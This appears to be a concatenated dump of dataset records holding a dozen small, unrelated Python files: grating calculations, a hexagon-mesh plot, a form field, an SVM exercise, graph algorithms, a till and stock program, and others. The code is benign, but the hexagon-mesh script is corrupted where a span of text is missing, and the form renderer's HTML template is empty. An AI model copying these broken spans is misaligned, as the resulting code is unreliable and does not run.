sinbeta2=%f\" % (Delta, sinbeta1, sinbeta2))\n\n if numpy.abs(sinbeta1) <= 1:\n sinbeta = sinbeta1\n elif numpy.abs(sinbeta2) <= 1:\n sinbeta = sinbeta2\n else:\n raise Exception(\"No valid beta angle\")\n\n # change sign of beta\n # sinbeta *= -1\n\n # beta = numpy.arcsin(sinbeta)\n\n sinalpha = order * wavelength * line_density - sinbeta\n\n # alpha = numpy.arcsin(sinalpha)\n\n else: # alpha\n A = (1.0 - order ** 2)\n B = -2 * order * line_density * wavelength\n C = order ** 2 * line_density ** 2 * wavelength ** 2 - 1 + c ** 2\n\n Delta = B ** 2 - 4 * A * C\n\n sinalpha1 = (-B + numpy.sqrt(Delta)) / 2 / A\n sinalpha2 = (-B - numpy.sqrt(Delta)) / 2 / A\n\n # print(\"Discriminant=%f, sinalpha1=%f, sinalpha2=%f\" % (Delta, sinalpha1, sinalpha2))\n\n if numpy.abs(sinalpha1) <= 1:\n sinalpha = sinalpha1\n elif numpy.abs(sinalpha2) <= 1:\n sinalpha = sinalpha2\n else:\n raise Exception(\"No valid alpha angle\")\n\n # # my value\n # sinalpha_me = m*lambda0*k0/(1-c**2) + numpy.sqrt( (m*lambda0*k0/(1-c**2))**2 - \\\n # ( (m * lambda0 * k0 / (1-c**2))**2 -1) )\n #\n # # Luca\n # sinalpha_luca = (-m * k0 * lambda0 / (c ** 2 - 1)) + \\\n # numpy.sqrt(1 + (m * m * c * c * k0 * k0 * lambda0 * lambda0) / (\n # (c ** 2 - 1) ** 2))\n #\n # print(\"sin_alpha numeric, me, luca: \",sinalpha,sinalpha_me,sinalpha_luca)\n\n # change sign of beta\n # sinbeta *= -1\n\n # alpha = numpy.arcsin(sinalpha)\n\n sinbeta = order * wavelength * line_density - sinalpha\n\n # beta = numpy.arcsin(sinbeta)\n\n return sinalpha,sinbeta\n\ndef vls_coefficients_calculate(sinalpha, sinbeta, rg, rgp, line_density=1000, wavelength=10e-10, order=1):\n\n #\n # calculate grating coefficients:\n #\n\n denominator = 2.0 * order * wavelength * line_density\n\n # VLS ShadowOui preprocessor\n # self.b2 = (((numpy.cos(alpha) ** 2) / self.r_a) + ((numpy.cos(beta) ** 2) / self.r_b)) / (\n # -2 * m * self.k * wavelength)\n # self.b3 = ((numpy.sin(alpha) * numpy.cos(alpha) ** 2) / self.r_a ** 2 - \\\n # (numpy.sin(beta) * numpy.cos(beta) ** 2) / self.r_b ** 2) / (-2 * m * self.k * wavelength)\n # self.b4 = (((4 * numpy.sin(alpha) ** 2 - numpy.cos(alpha) ** 2) * numpy.cos(alpha) ** 2) / self.r_a ** 3 + \\\n # ((4 * numpy.sin(beta) ** 2 - numpy.cos(beta) ** 2) * numpy.cos(beta) ** 2) / self.r_b ** 3) / (\n # -8 * m * self.k * wavelength)\n\n\n b2 = ( (1-sinalpha**2)/rg + (1-sinbeta**2)/rgp) / denominator\n b3 = ( sinalpha*(1-sinalpha**2)/rg**2 + sinbeta*(1-sinbeta**2)/rgp**2) / denominator\n b4 = (((4 * sinalpha ** 2 - (1-sinalpha**2)) * (1-sinalpha**2)) / rg ** 3 + \\\n ((4 * sinbeta ** 2 - (1-sinbeta**2)) * (1-sinbeta**2)) / rgp ** 3) / \\\n (4 * denominator )\n\n # print(\" b2=%f\\n b3=%f\\n b4=%f\\n\"%(b2,b3,b4))\n # print(\"Shadow coefficients:\\n c1=%f\\n c2=%f\\n c3=%f\\n\"%(k0,2*b2*k0,-3*b3*k0))\n # shadow_coefficients = (k0, 2 * b2 * k0, -3 * b3 * k0, 4 * b4 * k0)\n # print(\"Shadow coefficients:\\n c1=%f\\n c2=%f\\n c3=%f\\n c4=%f\\n\" % shadow_coefficients)\n\n return b2,b3,b4\n\ndef vls_coefficients_convert_to_shadow(k0,b2,b3,b4):\n return k0, 2 * b2 * k0, -3 * b3 * k0, 4 * b4 * k0\n\ndef trajectories(energies,r,rp,k0,m,b2,verbose=False):\n\n # if energies is an scalar\n if isinstance(energies,float):\n energies = numpy.array([energies])\n\n Alpha = energies * 0\n Beta = energies * 0\n\n\n for i,energy in enumerate(energies):\n #\n # get alpha and beta for any energy\n #\n\n wavelength = m2ev / energy # numpy.sqrt(Emin*Emax)\n\n A = -(1.0/r + 1.0/rp)\n B = 2 * wavelength * k0 / rp\n C = -A - (wavelength * k0)**2 / rp - 2 * m * wavelength * k0 * b2\n\n Delta = B * B - 4 * A * C\n\n if verbose:\n print(\"Second degree equation:\\n A=%f,B=%f,C=%f,Discriminant=%f\"%(A,B,C,Delta))\n\n x1 = (-B + numpy.sqrt(Delta)) / 2 / A\n x2 = (-B - numpy.sqrt(Delta)) / 2 / A\n\n if verbose:\n print(\" Solutions: x1=%f, x2=%f\"%(x1,x2))\n\n\n # print(\"A,B,C,Delta: \",A,B,C,Delta)\n # print(\"x1,x2=\",x1,x2)\n alpha1 = numpy.arcsin(x1)\n alpha2 = numpy.arcsin(x2)\n if alpha1 > 0:\n alpha = alpha1\n else:\n alpha = alpha2\n\n sinbeta1 = (wavelength * k0) - numpy.sin(alpha)\n beta = numpy.arcsin(sinbeta1)\n\n Alpha[i] = alpha\n Beta[i] = beta\n\n # print(\"alpha,beta = \",alpha*180/numpy.pi,beta*180/numpy.pi)\n return Alpha,Beta","repo_name":"srio/shadow3-scripts","sub_path":"ALS/grating_tools.py","file_name":"grating_tools.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10376686619","text":"from matplotlib import pyplot as plt\nimport numpy as np\nfrom math import *\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection, Line3DCollection\n\n\nfig = plt.figure()\n\n\nx=np.zeros(1)\ny=np.zeros(1)\nr=1 #радиус гексагона\nn=3 #количество точек на стороне\nh=r*sqrt(3)/2 #высота гексогона\nd=4 #длинна сетки\ns=6 #расстояние по x\n\n\n\ndef hexagon(x,y):\n #создание верхней пол��сы\n for i in range(n):\n x=np.append(x, -r/2+r*i/n)\n y=np.append(y, h)\n #поворот полосы \n for i in range(5*n):\n l=len(x)-n\n x=np.append(x, x[l]*cos(-pi/3)-y[l]*sin(-pi/3))\n y=np.append(y, x[l]*sin(-pi/3)+y[l]*cos(-pi/3))\n \n return x,y\n\ndef mesh(x,y,d):\n #создание высоких колонн\n for a in range(1,d,2):\n for b in range(-1,d+2,2):\n for op in range(n*6):\n x=np.append(x, a*1.5*r+x[n*6-op])\n y=np.append(y, b*h+y[n*6-op])\n #создание низких колонн\n for a in range(-1,d,2):\n for b in range(-1,d+2,2):\n for op in range(n*6):\n x=np.append(x, a*1.5*r+x[n*6-op]+1.5*r)\n y=np.append(y, b*h+y[n*6-op]+h)\n return x,y\n\ndef delpoint(x,y):\n x = np.delete(x, 0, axis=0)\n y = np.delete(y, 0, axis=0)\n x=np.round(x,3)\n y=np.round(y,3)\n print(len(x),len(y))\n i=0\n while(i=0 and q0[i][1]<=sqrt(3)*q0[i][0]+0.01 and q0[i][1]<=-sqrt(3)*q0[i][0]+s*sqrt(3)+0.01:\n q=np.append(q,[q0[i]], axis = 0)\n\n\n#сам массив из шестиугольников обрезанный по нужной форме\nmas=np.zeros((0,3))\n\nm=q\n#собственно сами повороты указано вокруг каких осей\n#чтобы получилась 1 нижняя грань\nm=pov_z(m,60)\nm=pov_x(m,55)\n\nh=max(m[:,2])\n\n#копирование одной гнани на три стороны\nmas=np.append(mas,m, axis = 0)\nmas=np.append(mas,pov_z(m,90), axis = 0)\nmas=np.append(mas,pov_z(m,180), axis = 0)\nmas=np.append(mas,pov_z(m,270), axis = 0)\n\n#создание верхней грани\nm=q\nm=pov_z(m,60)\nm=pov_x(m,-55)\n\n#подъем этой грани наверх\nfor i in range(len(m)):\n m[i,2]+=2*h\n#копировние на все строны\nmas=np.append(mas,m, axis = 0)\nmas=np.append(mas,pov_z(m,90), axis = 0)\nmas=np.append(mas,pov_z(m,180), axis = 0)\nmas=np.append(mas,pov_z(m,270), axis = 0)\n \nax.scatter(mas[:,0],mas[:,1],mas[:,2])\nax.axes.set_xlim(-5,5)\nax.axes.set_ylim(-5,5)\nplt.show()","repo_name":"NikEgil/virus-octahedron-and-icosahedron","sub_path":"октаэдр с гексагонами.py","file_name":"октаэдр с гексагонами.py","file_ext":"py","file_size_in_byte":4325,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24529626725","text":"from base64 import b64decode, b64encode\nfrom onegov.core.custom import json\nfrom onegov.form.display import registry, BaseRenderer\nfrom onegov.gis.forms.widgets import CoordinatesWidget\nfrom onegov.gis.models import Coordinates\nfrom wtforms.fields import StringField\n\n\nclass CoordinatesField(StringField):\n \"\"\" Represents a single pair of coordinates with optional zoom and\n marker icon/color selection.\n\n In the browser and during transit the point is stored as a base64 encoded\n json string on a simple input field. For example::\n\n eydsYXQnOiA4LjMwNTc2ODY5MTczODc5LCAnbG.. (and so on)\n\n =>\n\n {'lon': 8.30576869173879, 'lat': 47.05183585, 'zoom': 10}\n\n For verification: This points to the Seantis office in Lucerne.\n\n For convenience, the coordinates are accessible with the\n :class:`onegov.gis.models.coordinates.Coordinates` class when 'data' is\n used.\n\n Note that this field doesn't work with the ``InputRequired`` validator.\n Instead the ``DataRequired`` validator has to be chosen.\n\n \"\"\"\n\n widget = CoordinatesWidget()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.data = getattr(self, 'data', Coordinates())\n\n def _value(self):\n text = json.dumps(self.data) or '{}'\n text = b64encode(text.encode('ascii'))\n text = text.decode('ascii')\n\n return text\n\n def process_data(self, value):\n if isinstance(value, dict):\n self.data = Coordinates(**value)\n else:\n self.data = value\n\n def populate_obj(self, obj, name):\n setattr(obj, name, self.data)\n\n def process_formdata(self, valuelist):\n if valuelist and valuelist[0]:\n text = b64decode(valuelist[0])\n text = text.decode('ascii')\n self.data = json.loads(text)\n else:\n self.data = Coordinates()\n\n # if the data we receive doesn't result in a coordinates value\n # for some reason, we create one\n if not isinstance(self.data, Coordinates):\n self.data = Coordinates()\n\n\n@registry.register_for('CoordinatesField')\nclass CoordinatesFieldRenderer(BaseRenderer):\n def __call__(self, field):\n return \"\"\"\n
    \n {lat}, {lon}\n
    \n \"\"\".format(\n lat=field.data.lat,\n lon=field.data.lon,\n zoom=field.data.zoom\n )\n","repo_name":"OneGov/onegov.gis","sub_path":"onegov/gis/forms/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5544879097","text":"# !/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\n @ Time : 2019/02/20 08:22\r\n @ Author : Vodka\r\n @ File : linear_svm.py\r\n @ Software : PyCharm\r\n\"\"\"\r\nimport pandas as pd\r\nimport sklearn.svm\r\nimport scipy.io as sio\r\nimport matplotlib.pyplot as plt\r\n\r\nif __name__ == '__main__':\r\n # 加载数据\r\n mat = sio.loadmat('ex6data1.mat')\r\n print(mat)\r\n data = pd.DataFrame(mat.get('X'), columns=['X1', 'X2'])\r\n data['y'] = mat.get('y')\r\n print(data)\r\n\r\n # 画图\r\n positive = data[data['y'].isin([1])]\r\n negative = data[data['y'].isin([0])]\r\n fig, ax = plt.subplots()\r\n ax.scatter(positive['X1'], positive['X2'], s=50, marker='x', label='Positive')\r\n ax.scatter(negative['X1'], negative['X2'], s=50, marker='o', label='Negative')\r\n ax.legend()\r\n plt.show()\r\n\r\n # 定义SVM\r\n # C = 1\r\n svc1 = sklearn.svm.LinearSVC(C=1, loss='hinge')\r\n svc1.fit(data[['X1', 'X2']], data['y'])\r\n print(svc1.score(data[['X1', 'X2']], data['y']))\r\n data['SVM1 Confidence'] = svc1.decision_function(data[['X1', 'X2']])\r\n # C = 100\r\n svc100 = sklearn.svm.LinearSVC(C=100, loss='hinge')\r\n svc100.fit(data[['X1', 'X2']], data['y'])\r\n print(svc100.score(data[['X1', 'X2']], data['y']))\r\n data['SVM100 Confidence'] = svc100.decision_function(data[['X1', 'X2']])\r\n\r\n # 渐变色画图看置信度\r\n fig, ax = plt.subplots()\r\n ax.scatter(data['X1'], data['X2'], s=50, c=data['SVM100 Confidence'], cmap='RdBu')\r\n ax.set_title('SVM (C=100) Decision Confidence')\r\n plt.show()\r\n\r\n # 查看数据\r\n print(data.head())\r\n","repo_name":"Vodkazy/ML-Model","sub_path":"Ng_Mechine_Learning/SVM/Linear_SVM/linear_svm.py","file_name":"linear_svm.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25927705736","text":"import urllib.request\nimport json\n\nDOGSURL = \"http://downloads.ascentops.com/southhills/dogs.json\"\n# f = urllib.request.urlopen(DOGSURL)\n# data = json.load(f)\n# print(data)\n# f.close()\n\nPDFURL = \"https://www.southhills.edu/media/PDF/catalog/catalog_2017-18.pdf\"\nwith urllib.request.urlopen(PDFURL) as f:\n data = f.read()\n with open (\"download.pdf\", \"wb\") as dl:\n dl.write(data)\n","repo_name":"hessercan/SHSBT-Hesser-Python-Projects","sub_path":"week9/sample-url.py","file_name":"sample-url.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40213978317","text":"# A Python3 program for Prim's Minimum Spanning Tree (MST) algorithm.\n# The program is for adjacency matrix representation of the graph\n\nimport sys \n\n\nclass Graph():\n\n def __init__(self, vertices):\n self.V = vertices\n self.graph = [[0 for column in range(vertices)]\n for row in range(vertices)]\n\n def printMST(self, parent):\n print(\"Edge \\tWeight\")\n for i in range(1, self.V):\n print(parent[i], \"-\", i, \"\\t\", self.graph[i][parent[i]])\n\n def minKey(self, key):\n\n min = sys.maxsize\n\n for v in range(self.V):\n if key[v] < min:\n min = key[v]\n min_index = v\n\n return min_index\n\n def primMST(self):\n\n key = [sys.maxsize] * self.V\n parent = [None] * self.V \n key[0] = 0\n mstSet = [False] * self.V\n\n parent[0] = -1 \n\n for _ in range(self.V):\n\n u = self.minKey(key)\n\n mstSet[u] = True\n\n for v in range(self.V):\n\n if self.graph[u][v] > 0 and mstSet[v] is False and key[v] > self.graph[u][v]:\n key[v] = self.graph[u][v]\n parent[v] = u\n key[u] = sys.maxsize\n self.printMST(parent)\n\n\n# Driver's code\nif __name__ == '__main__':\n g = Graph(5)\n g.graph = [[0, 2, 0, 6, 0],\n [2, 0, 3, 8, 5],\n [0, 3, 0, 0, 7],\n [6, 8, 0, 0, 9],\n [0, 5, 7, 9, 0]]\n\n g.primMST()\n\n","repo_name":"vKrypto/practice-dsa","sub_path":"data_structures/graph/prims.py","file_name":"prims.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33157344510","text":"import random\nimport unittest\ntry:\n from unittest.mock import patch\nexcept ImportError:\n # < python 3.3\n from mock import patch\n\n\nclass Die():\n\n def roll(self):\n return random.randint(15, 99)\n\n\n@patch('random.randint', return_value=3)\nclass TestDice(unittest.TestCase):\n\n def test_standard_size(self, mocked_randint):\n die = Die()\n result = die.roll()\n\n mocked_randint.assert_called_with(15, 99)\n self.assertEqual(result, 3)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"python-br/pythontest-estudos","sub_path":"tests/test_random2.py","file_name":"test_random2.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"36774999079","text":"import json\r\n\r\nfilename = 'fav_num.json'\r\n\r\ndef print_num():\r\n\t\"\"\"Prints and retrieves fav number\"\"\"\r\n\ttry:\r\n\t\twith open(filename) as f_ob:\r\n\t\t\tnum = json.load(f_ob)\r\n\t\t\tprint(\"Your favorite number is \" + str(num))\r\n\texcept FileNotFoundError:\r\n\t\tnew_fav_num()\r\n\t\t\r\ndef new_fav_num():\r\n\t\"\"\"Creates and stores new favorite number\"\"\"\r\n\tnew_num = input(\"What is your favorite number? \")\r\n\twith open(filename, 'w') as f_ob:\r\n\t\tjson.dump(new_num, f_ob)\r\n\t\t\r\n\r\nprint_num()\r\n\r\n\r\n","repo_name":"AlexLinGit/SICP-and-Other-Code","sub_path":"Python Crash Course Exercises/chapter 10 - files and exceptions/favorite_number.py","file_name":"favorite_number.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19167111726","text":"# st2common\n\n__all__ = [\n \"ALLOWED_SCOPES\",\n \"SYSTEM_SCOPE\",\n \"FULL_SYSTEM_SCOPE\",\n \"SYSTEM_SCOPES\",\n \"USER_SCOPE\",\n \"FULL_USER_SCOPE\",\n \"USER_SCOPES\",\n \"USER_SEPARATOR\",\n \"DATASTORE_SCOPE_SEPARATOR\",\n \"DATASTORE_KEY_SEPARATOR\",\n]\n\nALL_SCOPE = \"all\"\n\n# Parent namespace for all items in key-value store\nDATASTORE_PARENT_SCOPE = \"u8kv\"\nDATASTORE_SCOPE_SEPARATOR = (\n \".\" # To separate scope from datastore namespace. E.g. u8kv.system\n)\n\n# Namespace to contain all system/global scoped variables in key-value store.\nSYSTEM_SCOPE = \"system\"\nFULL_SYSTEM_SCOPE = \"%s%s%s\" % (\n DATASTORE_PARENT_SCOPE,\n DATASTORE_SCOPE_SEPARATOR,\n SYSTEM_SCOPE,\n)\n\nSYSTEM_SCOPES = [SYSTEM_SCOPE]\n\n# Namespace to contain all user scoped variables in key-value store.\nUSER_SCOPE = \"user\"\nFULL_USER_SCOPE = \"%s%s%s\" % (\n DATASTORE_PARENT_SCOPE,\n DATASTORE_SCOPE_SEPARATOR,\n USER_SCOPE,\n)\n\nUSER_SCOPES = [USER_SCOPE]\n\nUSER_SEPARATOR = \":\"\n\n# Separator for keys in the datastore\nDATASTORE_KEY_SEPARATOR = \":\"\n\nALLOWED_SCOPES = [SYSTEM_SCOPE, USER_SCOPE, FULL_SYSTEM_SCOPE, FULL_USER_SCOPE]\n","repo_name":"bossjones/ultron8","sub_path":"ultron8/constants/keyvalue.py","file_name":"keyvalue.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29476741246","text":"# https://www.spoj.com/problems/CHICAGO/\n\nclass Edge:\n def __init__(self, source, target, weight):\n self.source = source\n self.target = target\n self.weight = weight\n\ndef BellFord(s,n,m):\n dist[s] = 1\n for i in range(n-1):\n for j in range(len(graph)):\n u = graph[j].source\n v = graph[j].target\n w = graph[j].weight\n if (dist[u]*w)/100 > dist[v]:\n dist[v] = (dist[u]*w)/100\n path[v] = u\n\nwhile True:\n n = list(map(int, input().split()))\n\n if len(n)==1:\n break\n\n dist = [0] * n[0]\n path = [-1] * n[0]\n graph = []\n\n for i in range(n[1]):\n u,v,w = map(int, input().split())\n graph.append(Edge(u-1,v-1,w))\n graph.append(Edge(v-1,u-1,w))\n\n graph.sort(key=lambda x: x.source)\n BellFord(0,n[0],n[1])\n print('%.6f' % (dist[n[0]-1]*100),' percent',sep='')","repo_name":"arnabs542/Competitive-Programming","sub_path":"BigO/Blue/Lecture10_Bellman-Ford/106MilesToChicago.py","file_name":"106MilesToChicago.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29240317150","text":"class Card:\n def __init__(self, card_number, expiration_date, cvv_code, issue_date, owner_id=None, status_card=\"new\"):\n self.card_number = card_number\n self.expiration_date = expiration_date\n self.cvv_code = cvv_code\n self.issue_date = issue_date\n self.owner_id = owner_id\n self.status_card = status_card\n\n def activate(self):\n if self.status_card == \"new\":\n self.status_card = \"activated\"\n return \"Card activated.\"\n else:\n return \"Card already activated.\"\n\n def block(self):\n if self.status_card == \"activated\":\n self.status_card = \"blocked\"\n return \"Card blocked.\"\n else:\n return \"Card cannot be blocked.\"\n","repo_name":"RikiTikiTavvi/hillel_pro","sub_path":"lesson5/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24794637383","text":"a, b, c = map(int, input().split())\nh = {}\nans = \"NO\"\nn = a\nwhile not n % b in h:\n if (n % b) == c:\n ans = \"YES\"\n break\n h[n % b] = 1\n n += a\nprint(ans)\n","repo_name":"whisper0077/programming-contests","sub_path":"atcoder/ABC/060/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9211505196","text":"import json, copy, csv, sys\r\nfrom product import Product\r\nfrom datetime import datetime\r\nimport time\r\n\r\n\r\nclass Penztar:\r\n def __init__(self, invnetory_file, products_file, nav_export_path) -> None:\r\n self.products = []\r\n self.invnetory_file = invnetory_file\r\n self.products_file = products_file\r\n self.nav_export_path = nav_export_path\r\n self.cart = []\r\n self.out_of_stock_products = 0\r\n self.total = 0\r\n\r\n def read_inventory(self):\r\n with open(self.invnetory_file, \"r\", encoding=\"utf-8\") as file:\r\n content = csv.DictReader(file)\r\n for row in content:\r\n name = row[\"name\"]\r\n count = row[\"count\"]\r\n product = Product(name=name, count=count)\r\n self.products.append(product)\r\n\r\n def read_products(self):\r\n with open(self.products_file, \"r\", encoding=\"utf-8\") as file:\r\n json_content = json.load(file)\r\n for categotry in json_content:\r\n # [{'name': 'öngyújtó', 'price': 309}, {'name': 'zsepi', 'price': 499}]\r\n data_line = json_content[categotry]\r\n for sub_data in data_line:\r\n item_name = sub_data[\"name\"]\r\n item_price = sub_data[\"price\"]\r\n for product in self.products:\r\n product_name = product.get_name\r\n if product_name == item_name:\r\n product.set_type(categotry)\r\n product.set_price(item_price)\r\n\r\n # print(list(map(lambda x: print(x), self.products)))\r\n\r\n def show_available_items(self):\r\n print(\"\\n=========================================\"\r\n \"======\\nAvailable items:\\n------------------\"\r\n \"-----------------------------\")\r\n counter = 1\r\n temp_data = {}\r\n self.out_of_stock_products = 0\r\n for product in self.products:\r\n name = product.get_name\r\n price = product.get_price\r\n count = product.get_count\r\n prod_id = product.get_id\r\n\r\n if int(count) > 0:\r\n print(f\"{counter:>4}.) {name:>15}\".ljust(30),f\"{count} db, {price} Ft\".ljust(15))\r\n temp_data[counter] = name\r\n counter += 1\r\n else:\r\n self.out_of_stock_products += 1\r\n print(f\"{name:>22}\", f\"\\t\\tOUT OF STOCK\".ljust(30))\r\n # counter += 1\r\n my_space = \" \"\r\n print(f\"{(len(self.products) + 1) - self.out_of_stock_products:>4}.){my_space:<12}Quit\")\r\n\r\n self._main_loop(temp_data)\r\n\r\n def _main_loop(self, temp_data):\r\n while True:\r\n choice = input(\"---------------------------------------\"\r\n \"--------\\nChoose a product...\")\r\n if not choice.isdigit():\r\n print(\"Type number only...\")\r\n continue\r\n choice = int(choice)\r\n if choice < 1 or choice > (len(self.products) + 1) - self.out_of_stock_products:\r\n print(\"Type a valid number...\")\r\n continue\r\n if choice == (len(self.products) + 1) - self.out_of_stock_products:\r\n print(\"Quitting...\")\r\n\r\n # PRINT PRODUCTS RECIPE\r\n print(\"\\n=================================\\nRECIPE\"\r\n \"\\n----------------------------------------------\")\r\n for product in self.cart:\r\n name = product.get_name\r\n price = product.get_price\r\n purchased = product.get_purchased\r\n subtotal = price * int(purchased)\r\n self.total += subtotal\r\n print(f\"{name}, {purchased}x, {price} Ft - subtotal: {subtotal}\")\r\n print(f\"TOTAL: {self.total} Ft\")\r\n print(\"----------------------------------------------\")\r\n # print(list(map(lambda x: print(f\"{x.get_name}, {x.get_count}x - {x.get_price} Ft, subtotal: \"), self.cart)))\r\n\r\n # SAVE NAV EXPORT\r\n self._save_nav_json()\r\n\r\n # SAVE NEW INVENTORY\r\n self._save_new_inventory()\r\n quit()\r\n\r\n chosen_item = temp_data[choice]\r\n print(f\"\\n======================\\nYou choosed: {chosen_item}\"\r\n \"\\n======================\")\r\n \r\n while True:\r\n amount_to_buy = input(\"\\n======================================\\n\"\r\n \"How much would you like to buy? \")\r\n if not amount_to_buy.isdigit():\r\n print(\"Type number only...\")\r\n continue\r\n amount_to_buy = int(amount_to_buy)\r\n if amount_to_buy <= 0:\r\n print(\"Type a valid number...\")\r\n continue\r\n\r\n in_cart = False\r\n for product in self.products:\r\n product_name = product.get_name\r\n product_count = product.get_count\r\n if product_name == chosen_item:\r\n if amount_to_buy > int(product_count):\r\n print(\"\\nThere is not enough to buy...\\n\")\r\n break\r\n new_product = copy.deepcopy(product)\r\n new_product.set_purchased(amount_to_buy)\r\n for cart_product in self.cart:\r\n if cart_product.get_name == product_name:\r\n in_cart = True\r\n current_purchased_amount = cart_product.get_purchased\r\n new_purchased_amount = current_purchased_amount + amount_to_buy\r\n cart_product.set_purchased(new_purchased_amount)\r\n current_count = product.get_count\r\n new_count = current_count - amount_to_buy\r\n product.set_count(new_count)\r\n print(f\"You bought {amount_to_buy}x from {chosen_item}\"\r\n \"\\n======================================\")\r\n if not in_cart:\r\n self.cart.append(new_product)\r\n current_count = product.get_count\r\n new_count = int(current_count) - amount_to_buy\r\n product.set_count(new_count)\r\n print(f\"You bought {amount_to_buy}x from {chosen_item}\"\r\n \"\\n======================================\")\r\n \r\n # print(list(map(lambda x: print(f\"{x.get_name}, {x.get_count}x\"), self.cart)))\r\n input(\"Press a key to continue...\")\r\n self.show_available_items()\r\n break\r\n\r\n def _save_nav_json(self):\r\n to_save_json = {\r\n \"register\": \"AP00700194\",\r\n \"sum\": self.total,\r\n }\r\n for product in self.cart:\r\n product_type = product.get_type\r\n product_name = product.get_name\r\n product_purchased = product.get_purchased\r\n if product_type in to_save_json:\r\n to_save_json[product_type].append({\"name\": product_name,\r\n \"amount\": product_purchased})\r\n else:\r\n to_save_json[product_type] = [{\"name\": product_name,\r\n \"amount\": product_purchased}]\r\n \r\n\r\n to_save_json[\"petrol\"] = []\r\n\r\n print(\"Exporting Nav doc...\")\r\n\r\n export_date = datetime.now().strftime(\"%Y-%M-%d\")\r\n export_hour = datetime.now().strftime(\"%H-%m-%S\")\r\n export_path = f\"{self.nav_export_path}nav_export_{export_date}-{export_hour}.json\"\r\n with open(export_path, \"w\", encoding=\"utf-8\") as file:\r\n json_save = json.dumps(to_save_json, ensure_ascii=False)\r\n file.write(json_save)\r\n print(\"Nav doc exported...\")\r\n\r\n def _save_new_inventory(self):\r\n headers = [\"name\", \"count\"]\r\n new_inv_items = []\r\n for product in self.products:\r\n product_name = product.get_name\r\n product_count = product.get_count\r\n new_inv_dict = {\r\n \"name\": product_name,\r\n \"count\": product_count\r\n }\r\n new_inv_items.append(new_inv_dict)\r\n with open(\"new_stock.csv\", \"w\", encoding=\"utf-8\", newline=\"\") as file:\r\n writer = csv.DictWriter(file, headers)\r\n writer.writeheader()\r\n writer.writerows(new_inv_items)\r\n\r\nclass Stock:\r\n def __init__(self, stock_file, invnetory_file) -> None:\r\n self.stock_file = stock_file\r\n self.invnetory_file = invnetory_file\r\n self.inventory = self.read_file(self.invnetory_file)\r\n self.new_inventory = self.read_file(self.stock_file)\r\n\r\n def start_stock(self):\r\n self.compare()\r\n\r\n def compare(self):\r\n print(\"\\n=======================\\nSTOCK\"\r\n \"\\n-----------------------\")\r\n for i in range(len(self.inventory)):\r\n inv_item = self.inventory[i]\r\n new_inv_item = self.new_inventory[i]\r\n\r\n inv_item_name = inv_item[\"name\"]\r\n new_inv_item_name = new_inv_item[\"name\"]\r\n inv_item_count = int(inv_item[\"count\"])\r\n new_inv_item_count = int(new_inv_item[\"count\"])\r\n\r\n if inv_item_name == new_inv_item_name:\r\n diff = abs(inv_item_count - new_inv_item_count)\r\n if new_inv_item_count < 0:\r\n print(f\"{inv_item_name:<20} -{diff}!\")\r\n\r\n if new_inv_item_count > inv_item_count:\r\n print(f\"{inv_item_name:<20} +{diff}!\")\r\n if new_inv_item_count < inv_item_count and new_inv_item_count >= 0:\r\n print(f\"{inv_item_name:<20} {diff}\")\r\n print(\"=======================\")\r\n\r\n def read_file(self, file_to_read: str) -> list:\r\n data = []\r\n with open(file_to_read, \"r\", encoding=\"utf-8\") as file:\r\n content = csv.DictReader(file)\r\n for row in content:\r\n storage = {\r\n \"name\": \"\",\r\n \"count\": 0\r\n }\r\n name = row[\"name\"]\r\n count = row[\"count\"]\r\n storage[\"name\"] = name\r\n storage[\"count\"] = count\r\n data.append(storage)\r\n return data\r\n\r\nif __name__ == '__main__':\r\n invnetory_file = \"inventory.csv\"\r\n if len(sys.argv) == 3 and sys.argv[1] == \"-l\":\r\n stock_file = sys.argv[2]\r\n # stock_file = \"new_stock.csv\"\r\n stock = Stock(stock_file, invnetory_file)\r\n stock.start_stock()\r\n\r\n else:\r\n products_file = \"products.json\"\r\n nav_export_path = \"nav_exports/\"\r\n penztar = Penztar(invnetory_file, products_file, nav_export_path)\r\n penztar.read_inventory()\r\n penztar.read_products()\r\n penztar.show_available_items()\r\n","repo_name":"8Klaro8/stock_second_solution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71562830520","text":"import torch\nimport torch.nn as nn\nimport sys\nsys.path.insert(0, '../common')\nfrom utils import *\n\ndtype = torch.FloatTensor\nif torch.cuda.is_available():\n dtype = torch.cuda.FloatTensor\n\ndef test(g_net, c_net, train_data, batch_size = 64, output_file='./test_results.txt'):\n prediction = 